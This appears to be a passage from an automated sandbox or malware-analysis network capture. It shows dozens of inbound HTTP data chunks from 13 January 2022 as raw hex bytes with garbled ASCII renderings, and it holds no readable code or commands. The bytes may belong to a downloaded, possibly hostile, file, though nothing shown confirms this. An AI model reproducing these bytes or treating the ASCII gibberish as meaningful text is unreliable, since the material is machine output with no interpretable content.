                          2022-01-13 19:22:18 UTC68INData Raw: b9 6a a3 59 b0 97 dc 9f 86 4d 6a 71 c6 4d 95 4e e4 a1 8d ea 84 89 00 12 96 c8 d3 6e 9d 9d 55 20 29 a5 49 a7 bc cf 66 95 f4 3d d1 ac f3 74 9a 7e a3 83 c5 45 4a c2 1c d6 ac 20 6f 12 b7 bf 53 67 d1 9e 34 1c 71 2f 55 3f e4 86 93 58 ce e1 0b c6 79 bb b3 a4 de 3c 26 60 f1 28 05 e4 7c 07 ff 31 8e 61 6c 85 b8 55 00 c7 aa 93 f9 c2 c1 5f 5e 23 31 da 57 82 42 34 0b cc 45 c9 ef 34 c4 30 15 d4 eb 30 5c 70 25 11 15 3e 2e 0f da 9a 3d 28 81 98 bc 79 3b a2 00 a8 99 9c 76 22 b6 cb 71 25 f6 43 aa 86 c3 15 09 87 b4 27 f4 49 8c 96 bc 94 ba 28 7b 2d 95 e1 78 7e 7c 19 1e d1 0c 45 4d 59 97 f0 af 8a 8f 5e 8b db 1f fe a5 bb 6b 8a 87 3f d1 67 03 25 1a 39 fa 5a 20 9e 6d 19 c9 71 d8 e6 c3 be 13 7d 55 69 05 24 41 0e fc c9 a4 a9 14 5f 67 1b c0 0f 06 e7 e3 b1 30 11 df 07 84 e5 8a 3a f7
                          Data Ascii: jYMjqMNnU )If=t~EJ oSg4q/U?Xy<&`(|1alU_^#1WB4E400\p%>.=(y;v"q%C'I({-x~|EMY^k?g%9Z mq}Ui$A_g0:
                          2022-01-13 19:22:18 UTC69INData Raw: ad 6b 5d 69 01 fe b2 30 01 3c 39 f5 27 95 ee 62 3f bc c1 54 ed c7 00 9a de 51 e5 2b 9e 09 2a ac f1 ce 6d cf c4 db 10 4b 5a e7 24 7a be 18 e5 31 9a 74 b6 a9 a6 53 b0 f7 77 22 65 12 4e ed 22 51 03 e9 cb 75 25 f2 55 43 63 0c 5c 36 ef 4c d9 1a 6a fe 09 84 63 cd dc f6 5f 71 27 50 c5 fa 97 2b 6d 60 f7 dc 8f 47 27 0a 31 4e 38 42 2e 1d ea 3e 53 4c 78 75 ce 89 d1 77 3a a6 27 56 fc 92 da e7 2f 82 50 83 de 8a f5 0e fd be c4 c6 ce 49 46 78 d6 5a 5a 16 4d 5d 7a 6b 05 64 6a 5a 5e 76 be da 87 cf d0 bf 13 11 7c 31 9e 10 5c 99 95 a2 c6 1b 55 e0 8c 49 54 f5 6a 6e 20 b5 0c b9 4c dc 86 b6 37 85 6d da 65 8d e4 b4 28 d0 f6 ac 15 0c a5 7c b2 2c 1f 56 21 c8 58 29 3a 99 eb 2c 0e 88 fd b3 23 29 6f f0 ba ce e7 27 a9 59 35 42 d5 94 61 77 26 32 28 03 38 fb 6a 7b 32 19 d3 71 4f 3b e6
                          Data Ascii: k]i0<9'b?TQ+*mKZ$z1tSw"eN"Qu%UCc\6Ljc_q'P+m`G'1N8B.>SLxuw:'V/PIFxZZM]zkdjZ^v|1\UITjn L7me(|,V!X):,#)o'Y5Baw&2(8j{2qO;
                          2022-01-13 19:22:18 UTC71INData Raw: 38 2e c8 ab 3f 4e 01 98 0b d6 9e 19 5a 3d 17 86 8d 5a 89 c0 df 08 22 56 0b c4 1d 54 86 57 69 1a bb 6a 3f 90 bf f3 ae 3b ac 3b dd 30 8e 9c dd ff ad a7 8d fc e2 39 bb 51 8d 56 1c 62 9d 91 f6 6f 1f 55 ad 17 5c f1 3c 23 98 01 11 7a 6b fd 53 5f 6d 14 d1 6d 86 3a eb 85 4e c2 c4 dc 25 c9 81 86 9d 2c 8b c0 dc 9a 9c d8 9a c4 12 a2 fc 52 cf 60 87 3c ea 8d 2a b6 cb 63 17 d6 bc dd b6 11 10 a1 31 9d 93 e1 3e e5 12 ed eb da 67 09 2d 8b be 61 35 74 70 48 74 ad b4 26 b7 c9 e2 5d b2 83 79 38 2a 05 84 24 3a 93 28 f0 c6 dd 1d e3 1d e3 43 1a be 70 da 9f 82 4a 97 7f 21 e8 7c 56 b8 2e 13 c1 17 96 c5 55 a5 2e 5a ec bf 44 b9 fc 21 e0 4e 6e cd 6a 80 51 13 bc 80 81 1b 0f 96 61 71 29 ed 1b d1 e6 6a 62 cc ef 2f 84 c0 b9 38 38 fb 7c fe 53 4a dc e7 cb 59 25 3b 10 00 a7 84 5b d3 3a 1d
                          Data Ascii: 8.?NZ=Z"VTWij?;;09QVboU\<#zkS_mm:N%,R`<*c1>g-a5tpHt&]y8*$:(CpJ!|V.U.ZD!NnjQaq)jb/88|SJY%;[:
                          2022-01-13 19:22:18 UTC72INData Raw: 22 8a 5d e1 54 96 94 64 41 98 0c fa 64 83 c6 c2 c9 b7 69 76 19 e0 8d ee aa 3d d5 63 a1 79 52 7f 83 be 6c 7a bc 65 03 f3 f3 b9 b1 9f 88 42 33 87 10 84 3e 8c 63 14 45 45 5b 19 dd 87 20 14 cd 2e 67 a8 01 f6 7f b4 c6 e3 10 40 37 a6 d8 40 5e 12 6f 15 cc f6 59 1c 70 0a 4c ad 0e 18 2d 2c 07 ea 8f 95 44 1c 79 3f b9 4b 9d 54 98 94 55 62 82 50 d6 e0 90 c0 26 15 42 6a e6 36 1c a6 2c 71 c9 41 a9 80 4d 53 84 96 1d 59 54 ee b0 23 f5 a0 1c f2 c5 3b 3b 1c 04 1c 77 fd f9 a5 76 84 50 c9 66 9d 5f bb 3d 1a 4f 5e f9 cf 75 5a e5 ca 6a fc 4a c3 54 e6 08 eb 5e 9d 6d 65 19 c0 d4 55 20 0a 31 a7 03 6e ec 52 24 03 51 84 ec df 17 aa 2a 0c 81 e3 75 bf 7c 61 66 f7 7e 90 74 b5 ab a1 26 97 60 e6 1f d2 f9 cb 6a 80 cf 5b d3 56 23 f1 5c 18 66 89 de 96 6c 3a 44 9a 63 e9 15 db 0b c9 63 cc c0
                          Data Ascii: "]TdAdiv=cyRlzeB3>cEE[ .g@7@^oYpL-,Dy?KTUbP&Bj6,qAMSYT#;;wvPf_=O^uZjJT^meU 1nR$Q*u|af~t&`j[V#\fl:Dcc
                          2022-01-13 19:22:18 UTC73INData Raw: 3c 85 8d 7f de 48 18 36 ec b2 94 3d b8 fb dd 66 35 b6 26 7a b5 a4 91 bf e6 bf e1 5d 7c 47 15 bf e8 54 e0 46 d2 81 75 04 b3 b9 4f 52 7d ce 36 18 82 44 46 1a 57 01 98 52 d8 89 cc f3 5b 26 de 84 81 e0 f1 c8 f9 67 48 c5 bf 71 25 f7 d5 65 a3 c8 7a ba 0b 03 45 cb 64 2e 49 47 95 f3 b2 80 7a b4 37 bc cc 19 51 f8 57 94 e2 f1 a8 97 e8 04 4d 4f 94 7a d2 4e f0 ac 2a 1c 60 58 aa f5 dc 17 29 8d 2c 07 43 0c 7e b3 a5 84 42 9e fd 0c 57 aa 04 c3 91 d7 7c 05 04 26 fe 49 a0 22 72 a2 0e 54 71 a2 d5 74 75 f3 b9 cb 5b db 83 c5 92 62 e8 14 74 ad bc d1 74 21 b0 ec b5 0e 81 b4 c7 20 7a b1 54 85 65 5b 7b 5b 9b 68 91 f8 45 a0 11 10 44 5f c9 41 b1 b9 4b 47 ed be 1f f6 f4 79 25 f4 4c d1 aa 1a 0a 19 f1 ed 26 12 f5 fa 5e fc 5a f2 d1 38 c4 c4 6e b6 22 68 98 77 d3 75 b9 1a 7c 78 a0 6a 79
                          Data Ascii: <H6=f5&z]|GTFuOR}6DFWR[&gHq%ezEd.IGz7QWMOzN*`X),C~BW|&I"rTqtu[btt! zTe[{[hED_AKGy%L&^Z8n"hwu|xjy
                          2022-01-13 19:22:18 UTC75INData Raw: b1 68 df 80 7b 64 47 ef 24 c5 d0 91 06 e4 a3 82 4b a6 a5 ef 88 00 a6 1f fe f6 2d eb ad 3b b8 41 bc d1 f7 fe c4 30 62 3a 47 5a f1 54 4a 26 7c 1f 54 11 bc d4 f3 a0 0c bf fb ca ee 2e b9 be bd 45 5b fa 72 1c b9 2a e0 e0 8d a1 c3 fd 65 75 bc da 2b 68 fa 4a 69 ae 41 b1 56 9b aa 93 58 61 0e 57 03 62 0f 03 37 ac 24 6a 3a 72 a3 96 69 b3 09 3e c1 a3 9a 05 67 1b 15 91 f4 4c 96 18 bc 7a 73 6b 17 4f ee d9 9e 44 3b 6d 1d 95 41 11 79 59 78 cd fe 18 44 93 97 f7 ce ea d4 68 6b 75 8d ee 0f 6c 26 06 57 d0 8d fe 0a 69 86 29 8d 00 43 44 46 c4 d5 d5 d1 19 95 f8 56 9d e2 e7 23 cd 2c 0d c3 cd 17 30 ce 84 bc de 6b 51 bc 5e 6a 2d e2 82 40 de 2b 3f 51 e8 4d 17 26 2d 46 7d a1 c1 48 d9 05 29 93 e3 01 5d 10 56 f5 61 d8 f2 22 6d 13 86 51 3c 8c e6 c0 a3 c1 51 69 b8 26 67 5e f7 9a 60 ea
                          Data Ascii: h{dG$K-;A0b:GZTJ&|T.E[r*eu+hJiAVXaWb7$j:ri>gLzskOD;mAyYxDhkul&Wi)CDFV#,0kQ^j-@+?QM&-F}H)]Va"mQ<Qi&g^`
                          2022-01-13 19:22:18 UTC76INData Raw: 5e 46 d1 74 e3 1c 28 66 16 cf 2e 1a 6f 13 af 20 4c ad 7c 0c 96 07 3b 1a 7a 74 4a 1c 0f c1 1c 60 38 93 32 a6 05 6b 11 13 6f d3 2a 18 1f fe 97 4c 0a e0 98 3f bf 85 25 c7 2f 8c 37 a2 d7 e9 10 05 3a 7a b4 f8 a2 31 cb 71 79 3e ed 82 7f 9f 91 a0 1b b6 a9 2f ab a7 ec fc 48 dd ad 67 8a 1a 6e 37 46 9a 6e 93 f8 14 3a 43 bc 81 2c 05 32 f9 0f ce 5c 13 6b 5d 65 0d d4 9b 92 76 a6 44 3c 36 8f 8b 0c 39 b1 c8 50 d6 9f 67 d6 e4 be 13 be 67 ed e0 e2 31 0f 99 e1 1b f6 36 16 b3 5a ed 33 32 b5 00 d3 72 a4 13 39 6d 13 b7 a5 2c e8 ba d7 a5 05 24 7a a2 1c cc d9 c7 81 c3 56 e9 48 9a ec 0e dc 1d 09 a3 8a 2d 3f a3 93 f4 9c 5e 6d a3 09 70 cb 77 31 8c c0 3d e9 22 6d 0a df b6 83 50 bd 24 65 8c fc 52 c6 30 da f0 5e 36 5d 31 74 d3 74 c8 49 3e 91 be c6 c0 d1 72 04 59 35 85 c9 70 c5 19 c7
                          Data Ascii: ^Ft(f.o L|;ztJ`82ko*L?%/7:z1qy>/Hgn7Fn:C,2\k]evD<69Pgg16Z32r9m,$zVH-?^mpw1="mP$eR0^6]1ttI>rY5p
                          2022-01-13 19:22:18 UTC77INData Raw: 29 44 4f ea 0e 55 7c b5 2f d4 85 86 55 37 a8 fc c1 14 5b 7f d0 8f 98 7a b8 61 7e ac 85 76 f3 c9 6f 0d a9 8e 17 53 5d 6a ca f4 da 69 68 f5 50 73 71 31 9a 60 95 f5 0c ca e6 ad e0 ed 71 22 61 19 83 c9 7b 4f 81 1d 51 8e e4 c9 c3 f6 16 4e ca e2 e5 28 8c af b3 b2 a9 3b 17 91 f4 56 e1 a7 43 a2 63 1f 75 8b d4 fd 80 5b db e9 f6 3b 31 32 4b 42 2f 92 08 bc 8b 56 e7 3b ff d5 32 7f 50 79 7b 33 84 52 bc b5 2c 9f 75 48 c8 fa ff 1c e9 4a d5 6d 1d 7d 37 a1 88 e7 f8 cc 0e 96 3c 5e bd 06 6c 90 79 37 a6 4a 61 46 85 11 89 35 0e fe 12 46 cc f7 9f 9a 0f 00 42 60 f0 af b9 41 a3 29 07 30 13 73 8f ab b7 ab af d3 eb 9b e8 a0 02 b2 53 5d 33 2e 13 cd c9 d3 3c 3f a0 1d b1 a9 f8 4e fb 39 a7 90 c1 fe 19 d9 0d c2 b5 0e 9a 0f a2 0c 6d 5e ff d2 ad 97 71 1b 93 b7 a4 46 c9 1b 84 50 bb 21 e9
                          Data Ascii: )DOU|/U7[za~voS]jihPsq1`q"a{OQN(;VCcu[;12KB/V;2Py{3R,uHJm}7<^ly7JaF5FB`A)0sS]3.<?N9m^qFP!
                          2022-01-13 19:22:18 UTC79INData Raw: 20 31 6b 45 4d f8 2d 49 24 d1 ce 13 a8 58 f9 86 50 91 ec e1 17 8c 43 f5 c7 2a 1b 77 b2 d9 19 c3 58 9a 3a 24 63 36 b2 08 eb fb 52 1b 44 07 7a 66 5d 1c 0b 9f 1c 0e df 14 32 8e 2e 6a c7 69 77 3f 6e 02 a2 0b 39 7a 0a 79 52 3c 99 e6 d6 93 ef 75 a0 62 10 a4 02 dc 94 7c 1e 83 29 ff cd 6c 05 84 53 3b a2 03 b8 d2 13 ad a5 9d 95 67 a8 04 b6 88 8b cd b7 b6 23 f7 d1 24 28 de c3 18 55 4e 94 07 41 fb c8 99 fb b0 b5 b5 0a b8 4f 5a ec aa 4b df 4d 20 2b 6e ae 44 d7 ff d0 f5 c2 7f 37 d2 1c 78 c0 68 ff c1 42 39 de 61 4b 06 b3 ab ba d8 ea 0f 24 66 8a 50 d6 00 8e 11 19 33 91 6a 91 18 40 f2 a8 13 97 f0 fb dc df b7 55 71 77 bd d2 ec bc c3 5f 73 0b 9f 91 e1 94 49 05 37 a1 90 7a cc 75 b1 91 f9 d1 65 64 db a6 ba e6 a7 9c 07 2d 4b 10 54 ee 27 a9 e8 e5 2d dd 08 24 c2 c9 79 22 62 ea
                          Data Ascii: 1kEM-I$XPC*wX:$c6RDzf]2.jiw?n9zyR<ub|)lS;g#$(UNAOZKM +nD7xhB9aK$fP3j@Uqw_sI7zued-KT'-$y"b
                          2022-01-13 19:22:18 UTC80INData Raw: 3a b4 f4 aa 6c 91 e5 36 5a f4 b4 30 d3 c9 26 79 3e 2c 57 67 5c f1 fa e4 e5 34 19 cd 30 10 1c 67 d5 91 b7 a8 0f d5 30 01 63 0f 15 79 b9 51 58 ed 46 c5 3b b6 ef de 13 c3 5c e5 6f 13 84 51 9d 36 a6 4c ce b2 32 d9 e1 a2 40 30 57 74 61 96 b2 67 0c a7 90 b0 ca 32 56 e9 63 1b 35 72 6f 4d 5e a6 0e 86 e4 77 71 2c 5a f2 8f 0e 91 a4 1d a9 9c ce 1b 2f de 8b 85 c9 b8 8a 88 15 ce bd 50 13 34 c2 84 4f 17 c6 07 d9 36 91 f6 08 b3 e6 3f 5d 48 8a cd c5 16 4b 4e c2 cb a6 4a d7 1a 38 38 70 af 00 00 e1 0a b2 2c 7a df 03 e4 ef 28 03 7a b5 11 aa 3c 52 49 a3 d7 00 be cc 84 52 62 d6 9c 13 4f f6 1d fc 5a fb ac 42 21 19 c7 69 1e cb c8 a0 1a 77 22 20 7e b5 bb 42 5e f1 c3 0d dd 19 8b c4 94 6e 35 77 7a a5 88 44 58 96 7d 60 ae 20 6b ba 06 04 f1 34 b5 0f 0a c2 75 b5 e0 9d 8b da f4 41 01
                          Data Ascii: :l6Z0&y>,Wg\40g0cyQXF;\oQ6L2@0Wtag2Vc5roM^wq,Z/P4O6?]HKNJ88p,z(z<RIRbOZB!iw" ~B^n5wzDX}` k4uA
                          2022-01-13 19:22:18 UTC81INData Raw: d1 b1 0d d4 af cd d4 0f cd 76 a8 a4 19 8e 3f d1 ca e8 e9 6c 6f ff 54 b6 03 6a 83 af f3 d9 5f 29 8e 7f 2e cb 14 e5 fe 40 dc 53 41 59 aa 31 2a 02 b2 48 72 97 fb db 1f 40 50 bd 40 60 e1 0b cb 83 d9 b6 6f 6b fe e7 6b db 58 98 1f bc dc 72 e1 1e 60 0c 88 2a eb fb a9 72 6b 7e 0f 07 47 51 7f 28 18 e5 7e d3 83 32 a7 98 16 ec e5 2c 1a 7c ab 48 d8 9c 0f 7a bd e8 d8 32 f5 de 95 f5 76 18 33 24 08 ba de 9e ee 55 1f 5a 53 42 24 7e 51 38 44 91 19 db 1f fd 32 52 be 70 4f 4e db 14 ba 8c 3c c6 52 ce ec ad 40 4c ab 11 98 74 b6 25 1c 18 38 cd 29 8e 72 a8 f1 fe 25 10 0d d7 04 b0 9c 34 6a 23 93 f1 2d 96 c3 71 41 54 5c e7 35 92 82 5c 83 7b de 93 e5 26 d3 73 5b 9e aa 26 70 ab 4f 54 9f 67 81 c2 c5 4c 3f b8 42 d3 fa 46 de 82 aa 31 fa b8 ba c2 df 19 31 92 27 88 4e bc dc 9e 06 5e e0
                          Data Ascii: v?loTj_).@SAY1*Hr@P@`okkXr`*rk~GQ(~2,|Hz2v3$UZSB$~Q8D2RpON<R@Lt%8)r%4j#-qAT\5\{&s[&pOTgL?BF11'N^
                          2022-01-13 19:22:18 UTC83INData Raw: 51 34 fb 23 da fe 40 31 fb 0d 7a 8f 85 89 61 c7 a2 e0 bf 3d 90 63 ee 76 4e ca 25 96 e7 17 05 df 1a 31 57 d7 0f 16 b2 1f b7 d9 39 4f 8e d9 27 bc 5b 03 c6 0a 57 4c 48 49 3d 78 7a 5b 4f 0d ec 23 9f 5c 46 cd 3a ea 5c 5a 3a 90 73 69 60 90 80 8c bb 46 1b d8 35 8f 29 35 9f 27 a0 3b a2 0e 76 e9 2f 99 bb 39 33 7c 9b 97 63 97 d6 e0 81 c3 25 e0 54 b9 53 42 79 49 db b0 33 fc e4 6f 0f b5 ab ba a5 8a f4 03 3e 3b 46 05 bd 17 84 0d 6a b4 68 51 5d 64 5c ea 74 a7 ae 30 0b d8 e2 0c 42 83 d5 1f 84 dd 51 2d 1e 86 4e bb 5a f0 ee 43 b7 f6 55 3f 24 f7 cd c8 16 48 d9 3b 3b 14 5f 19 75 b9 21 90 69 1f 7f 69 02 d6 82 54 9e 5c 97 a1 1c 8c 71 45 5d 76 cf 7a 88 e7 e6 ec fe fa ef 2c a1 e6 f0 c6 d9 a7 ee c7 c8 59 01 2d a4 80 a1 f2 ee 56 f2 3a b0 cd 15 b0 3c 30 be 62 b8 40 33 90 0f 98 7f
                          Data Ascii: Q4#@1za=cvN%1W9O'[WLHI=xz[O#\F:\Z:si`F5)5';v/93|c%TSByI3o>;FjhQ]d\t0BQ-NZCU?$H;;_u!iiT\qE]vz,Y-V:<0b@3
                          2022-01-13 19:22:18 UTC84INData Raw: 8c 1b ad 5e 27 a1 22 5a ac ff 9f 73 fc 0d 60 c0 94 b5 be 48 a7 dd 58 ed 7a fd 0f bf 40 4e 08 7c dc e3 b3 ba 28 13 a4 49 e3 90 1f 05 f1 8c 6b 78 b0 91 88 bb 43 a6 0b d3 d4 21 dd a2 15 d3 7e c4 7a 20 5c 4e d7 18 31 7c 81 db 09 22 99 4a 3d b2 4c 37 94 70 be c4 68 38 49 44 4f e7 e8 b5 b6 38 5d d4 bb 26 3e 20 27 82 29 ea ad ad ad ad bc 29 4a a5 78 77 78 55 f2 f8 f6 7d 5b 7c 2c e4 f2 3f b1 b8 9b 18 a8 5c 92 c6 33 da e0 92 73 3c c9 64 8b c9 d3 bc b0 c7 be 83 a3 cc 93 f1 65 09 26 62 31 4a af 10 88 0b be 8a 03 e7 cc 4f ef 2b 9b e1 17 db 09 6b f5 e0 d7 d6 7f c0 93 ba bc af d3 60 65 1d e8 b4 da 52 a2 b7 64 cf 26 31 64 18 b9 83 81 a8 18 a8 4f 4d 4f fd 7c 2c 7d 3a 29 c4 06 3e 2b 43 4d 88 11 9c a8 fd cb fe bd 58 7a 5b 62 fd 7f 29 ec cf e6 52 df cc 0f 0e f6 54 e2 95 ef
                          Data Ascii: ^'"Zs`HXz@N|(IkxC!~z \N1|"J=L7ph8IDO8]&> '))JxwxU}[|,?\3s<de&b1JO+k`eRd&1dOMO|,}:)>+CMXz[b)RT
                          2022-01-13 19:22:18 UTC85INData Raw: 08 a4 16 c9 07 36 0e d6 32 98 06 19 77 0f da 9c 1d 82 45 45 1c 7e a4 f8 86 29 25 84 51 31 39 56 d2 ec b0 24 10 42 02 0e a5 9b 11 02 fa 0a 14 ea b3 5e 36 26 01 29 83 af d4 87 46 5d 46 de 9c 1d 87 d0 89 c2 7a 69 59 8b 45 a3 8e 1f 71 d2 cb 15 7e c0 b3 d9 7e f5 00 1d 9a 3f ad 68 6b 01 aa 2d 85 cb 6c bc 72 67 57 0e ed 8f cd f7 2d f2 fa 7f da 92 75 2e dc 9c 0d 70 b9 ac 05 61 0f 07 7b 32 36 4e 40 0a ee 70 f2 17 27 3e 7e 2d a8 45 99 95 c8 b9 b4 1e fd b9 6a 23 97 51 47 d3 c2 a4 72 f9 5c 78 c7 ce 9d 07 23 1e 7f c7 26 66 2c 8e d7 03 bb 1e 77 b5 e5 38 98 70 c3 12 57 c1 03 47 f8 4a de ca f5 6f 43 c3 a7 66 cf 1a ce ad ac 6c fe b2 7d 42 7c d2 4f 04 df 5c e9 63 f1 e6 e7 79 f4 e8 19 d8 36 19 9e 4a d2 19 21 1a 74 1c 20 69 bd 1a 67 e7 36 bd 10 57 c3 14 2e e0 8d be 9b e2 31
                          Data Ascii: 62wEE~)%Q19V$B^6&)F]FziYEq~~?hk-lrgW-u.pa{26N@p'>~-Ej#QGr\x#&f,w8pWGJoCfl}B|O\cy6J!t ig6W.1
                          2022-01-13 19:22:18 UTC87INData Raw: 42 35 0f b9 37 17 dd 47 1d f8 e4 c0 bc 78 df 59 01 c3 32 1e 31 f3 78 d8 e4 e3 69 a0 70 c5 2c b5 7b 2e 07 31 3c c4 c5 b0 29 f4 07 33 3f c9 d1 6d 8b 91 f9 65 66 8e d6 93 97 ae 37 0b a0 77 9a 15 8b b2 81 b7 b9 14 26 99 80 3e 72 c2 30 7b 56 9f 3e a9 83 d6 9f 1b 5b 10 a0 0d 8e 3a 2b 1d 92 9b e8 ff 99 f1 99 96 7e 0b c3 0d 8f e4 37 c8 9b 16 58 f4 03 24 d5 11 aa 8f 85 82 2f 2a 68 94 30 6a 2a 66 eb 78 db b9 28 71 43 53 0c 48 ca e0 3b 16 32 ff d3 d0 ab b2 a5 ef d0 ff b2 7a b4 a5 f0 bc 67 19 22 3f b6 90 18 21 48 cb 3d fb d2 6b 68 fb 3f db 44 54 0d ab bb 1d 88 ec cf 15 9d fb 3e 50 be b0 cb 9d 83 cb 7c 2f 7d 45 b0 27 18 19 dd 82 2f 7d 3a 8d bc c4 7c dd 15 32 00 f3 94 63 97 88 2e e1 0e 3f f5 c2 70 c7 1d 00 df 59 05 83 a9 80 19 a8 f0 de ec e5 58 5b 08 cd 0e ab bd 45 4d
                          Data Ascii: B57GxY21xip,{.1<)3?mef7w&>r0{V>[:+~7X$/*h0j*fx(qCSH;2zg"?!H=kh?DT>P|/}E'/}:|2c.?pYX[EM
                          2022-01-13 19:22:18 UTC88INData Raw: 83 b5 b1 b2 36 41 da e7 25 c2 b3 b2 3c c3 8e 75 78 ef eb a1 34 7d 44 94 29 f6 dd f3 d5 84 96 c4 ed 68 fd 4b 26 71 97 46 c7 2c 70 14 b8 e6 d4 10 8c 1b fe 4b 4d cc f7 2a 98 8a ec 1d 63 1f e0 c3 ab 0a b9 f0 ad ba 9c 7b ae b2 88 4c dc 83 d2 c4 69 06 b9 3d bd 4c 97 9a ea da e0 cd 6a ea d7 52 d7 4b 4e c7 6a 7f 1b 9b a0 52 8f 2a f0 16 f0 b3 1d c0 6d fe 74 7f ae b0 33 38 91 9e e5 59 08 07 1e 3c 4f c3 ef 57 8b d1 1c 2b e3 ae 21 88 4b 54 a8 68 c7 69 7f 6b a7 85 ab c4 d8 73 36 14 4c 60 22 0e 18 83 f2 7f a7 0f cb c8 00 d5 38 8a dc f6 df 73 d7 27 13 d1 12 12 38 c4 a4 b5 01 33 0f 7d 58 1a 66 ec f3 bb d7 e1 77 b8 d5 01 b8 85 ab 4e b3 f1 54 08 51 42 64 f0 53 b6 5a a6 6d f6 a0 65 5e 95 48 2e 61 27 87 61 c7 14 11 cf 8c 98 29 d3 bf d0 b7 a5 24 67 9a 31 92 c7 1f 7b de 8d 09
                          Data Ascii: 6A%<ux4}D)hK&qF,pKM*c{Li=LjRKNjR*mt38Y<OW+!KThiks6L`"8s'83}XfwNTQBdSZme^H.a'a)$g1{
                          2022-01-13 19:22:18 UTC89INData Raw: ab a2 07 2a c3 b6 33 93 54 24 0b 2f 4e 9e 1a 2f 34 39 f6 96 e1 ac 36 b5 0d b1 f6 e8 5e 04 b7 bf f0 b4 af 18 4f e7 10 17 96 09 9a 2b 83 23 1a 84 eb 6c 2b 6b 94 83 cd 67 44 db b9 c1 e7 2a 70 e4 59 df 9c b5 b6 ae 72 57 d8 0b 72 b8 38 78 37 3c 96 c9 6c f9 5a 8c 6f 61 da dc a9 30 4f 63 9a 30 2c 9f d2 c0 43 ec 84 df 4a c1 41 89 c3 50 d6 38 ec c7 da 4f 1b 8c fa ef 2f 9b ec 03 36 4d 8e c3 b8 3c 6b 5d 38 84 72 e9 e3 03 20 c0 86 5e be 68 38 35 c5 0e d3 44 6e 5c 58 2f 36 b4 27 80 ef 22 9f 86 51 28 18 5f 29 35 e5 3e 35 30 a6 7a be ca ee f9 d0 91 25 55 06 b2 3f a6 0b d1 f6 aa 2e 14 e0 52 bc 9c ea c5 40 2a 10 17 8c 5f 61 d1 a7 8a 36 bd dc e3 19 d3 6b 74 b7 fd c0 cc f3 52 b4 a0 70 b7 94 90 66 9a 2b 60 96 7b 24 e6 10 20 65 08 b5 de 32 af 33 f4 5b fd 56 ff de 05 49 d9 68
                          Data Ascii: *3T$/N/496^O+#l+kgD*pYrWr8x7<lZoa0Oc0,CJAP8O/6M<k]8r ^h85Dn\X/6'"Q(_)5>50z%U?.R@*_a6ktRpf+`{$ e23[VIh
                          2022-01-13 19:22:18 UTC90INData Raw: 5e 6c 30 83 03 c7 b4 dd a1 df d8 d9 e6 cc 8f f4 31 4e fe 24 f3 6f f5 39 45 ae 48 ca 45 8c 95 e6 4f 23 92 d6 72 0c cf 24 06 b1 0d 44 94 73 55 bc 26 72 b1 8f 60 1d 5d 14 23 00 e2 cd 9a df ec 1d 6e 44 f7 3c d7 63 27 76 16 e3 56 52 19 b3 0e b4 ea 0d 7f 99 cd cb 0f d3 09 7c 67 2e 6a 71 42 15 50 3c a6 71 28 31 10 e7 b5 30 c1 1c e4 32 ac df 9e 94 d9 ce 91 12 62 08 40 bb 16 11 ea b5 19 66 ba 6d 33 1f 16 b2 e6 98 fc f1 3f a9 c8 46 f9 96 12 93 1d e7 0f 0d 46 d7 60 39 42 ca ff f7 ab 81 4d 33 db 8a 6e 8d 14 90 e5 83 fe 72 ce 22 4a 96 51 ca 5d 43 25 43 0d 88 0d 17 0d 07 42 54 b4 3e fd bc 35 76 50 5c ff 65 e9 78 c7 e6 50 65 ea 9a ab 56 10 99 21 fa 7e 62 31 92 8b 56 76 76 db e5 e2 e0 a9 f9 d5 7f 94 28 7d b7 5e 44 64 51 f1 35 0b 54 11 6f 70 d7 74 a0 f5 8f f3 bb b1 20 0c
                          Data Ascii: ^l01N$o9EHEO#r$DsU&r`]#nD<c'vVR|g.jqBP<q(102b@fm3?FF`9BM3nr"JQ]C%CBT>5vP\exPeV!~b1Vvv(}^DdQ5Topt
                          2022-01-13 19:22:18 UTC92INData Raw: 30 cd 95 91 e3 01 2a 44 ce a6 0e 5b 49 b9 85 85 7f 21 01 4d 26 79 2c 54 a0 74 bd 62 61 7b 8a 50 9a 13 72 0e 39 c3 58 f9 95 fd ea 01 f2 08 d7 78 d4 e4 a5 85 d9 1c f6 d1 05 4e c7 6c 29 5d 0b 9d 93 d3 d9 ed b2 4c cc f8 0e 0a fe 51 62 c4 8a 88 75 8f 0e 04 a4 f1 62 47 3a e0 e5 4b e3 08 2f 7b 43 53 dd e8 b1 ff 6e 2a 84 b8 30 4c 63 e1 9e 87 c0 98 f1 d7 bb cd 6c cb 96 90 93 18 50 81 44 83 44 be c4 91 6c 73 d4 04 b7 e1 67 ee 33 11 cf 2d ef 89 22 86 53 19 b0 c2 54 1a 64 df 6c 2e 80 c2 c4 9e 18 89 df 16 40 3a 6f d8 7b e5 60 21 5d 90 eb 1a 7b d5 8e 4a 06 3d cc ca d5 03 b8 32 a7 9a a6 12 4e d4 84 33 dd 57 f2 5b 7e b1 1a d5 31 86 4d 4e 90 7a c8 27 11 89 da 86 58 e5 25 fb dc 90 8b 68 96 76 3d f5 b7 1a ed 37 42 fc 30 12 cc 5d 68 8b 30 f7 a3 cb 0d 1e 75 2c 12 5e b4 69 45
                          Data Ascii: 0*D[I!M&y,Ttba{Pr9XxNl)]LQbubG:K/{CSn*0LclPDDlsg3-"STdl.@:o{`!]{J=2N3W[~1MNz'X%hv=7B0]h0u,^iE
                          2022-01-13 19:22:18 UTC93INData Raw: 94 78 ae 90 33 85 62 64 94 7c bf 5f 1b ff 28 af b3 a7 3b d6 f6 45 99 80 d0 55 65 0f de 99 91 89 d5 fa e1 16 5e 4c 12 31 ce aa a1 54 b1 27 d9 56 26 84 94 3e a4 2b db cf 43 21 4c 1a 95 ea a4 69 25 4d 38 c4 c3 4a 5d f6 41 aa 8c 65 ed 1e 3c 4f a7 94 e3 97 0b 41 e0 e0 00 47 22 e7 2f 93 24 25 34 e6 60 a8 c3 bb da d8 cd 89 3f e8 c8 17 0a eb 27 1b 9c 59 38 36 ca 9a 7b d5 8c 4e d6 68 44 29 17 c2 c0 54 68 81 c1 fd 63 f1 3d cc f3 c4 82 9e 2b aa 4c 42 24 e7 cd 17 99 3d 06 68 de aa e9 24 5a 3d cd ce e9 ce fd 36 62 d6 6a 3f 08 77 7d 3a 47 9e bd 94 7d 38 53 b7 bd 4e 78 59 ae 73 34 77 39 61 c6 ce f3 51 1e 15 7d 5a 32 6d e9 e5 40 4b 59 be 33 99 e9 7a 92 ae 01 f2 14 57 38 39 c7 04 af a9 a2 0f c6 75 31 7d e1 e4 51 51 17 29 de 38 a4 6d 48 df 56 f9 99 8e 61 7c a6 53 48 e3 f2
